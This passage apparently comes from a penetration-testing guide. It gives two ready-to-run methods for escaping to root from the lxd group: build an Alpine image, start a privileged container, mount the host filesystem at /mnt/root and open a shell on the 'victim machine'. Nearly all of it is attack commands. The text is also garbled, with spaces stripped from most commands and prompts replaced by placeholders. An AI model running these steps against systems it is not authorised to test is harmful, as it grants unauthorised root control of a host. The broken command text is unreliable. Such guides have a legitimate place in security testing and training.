sudosu#Install requirementssudoaptupdatesudoaptinstall-ygolang-godebootstraprsyncgpgsquashfs-tools#Clone reposudogoget-d-vgithub.com/lxc/distrobuilder#Make distrobuildercd $HOME/go/src/github.com/lxc/distrobuildermake#Prepare the creation of alpinemkdir-p $HOME/ContainerImages/alpine/cd $HOME/ContainerImages/alpine/wgethttps://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml#Create the containersudo $HOME/go/bin/distrobuilderbuild-lxdalpine.yaml-oimage.release=3.8
Then, upload to the vulnerable server the files lxd.tar.xz and rootfs.squashfs
Add the image:
lxcimageimportlxd.tar.xzrootfs.squashfs--aliasalpinelxcimagelist#You can see your new imported image
If you find this error Error: No storage pool found. Please create a new storage pool
Run lxc init and repeat the previous chunk of commands
Execute the container:
lxcstartprivesclxcexecprivesc/bin/sh[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
Method 2
Build an Alpine image and start it using the flag security.privileged=true, forcing the container to interact as root with the host filesystem.
# build a simple alpine imagegitclonehttps://github.com/saghul/lxd-alpine-buildercdlxd-alpine-buildersed-i's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",'build-alpinesudo./build-alpine-ai686# import the imagelxcimageimport./alpine*.tar.gz--aliasmyimage# It's important doing this from YOUR HOME directory on the victim machine, or it might fail.# before running the image, start and configure the lxd storage pool as default lxdinit# run the imagelxcinitmyimagemycontainer-csecurity.privileged=true# mount the /root into the imagelxcconfigdeviceaddmycontainermydevicedisksource=/path=/mnt/rootrecursive=true# interact with the containerlxcstartmycontainerlxcexecmycontainer/bin/sh
lxcinitubuntu:16.04test-csecurity.privileged=truelxcconfigdeviceaddtestwhateverdisksource=/path=/mnt/rootrecursive=truelxcstarttestlxcexectestbash[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted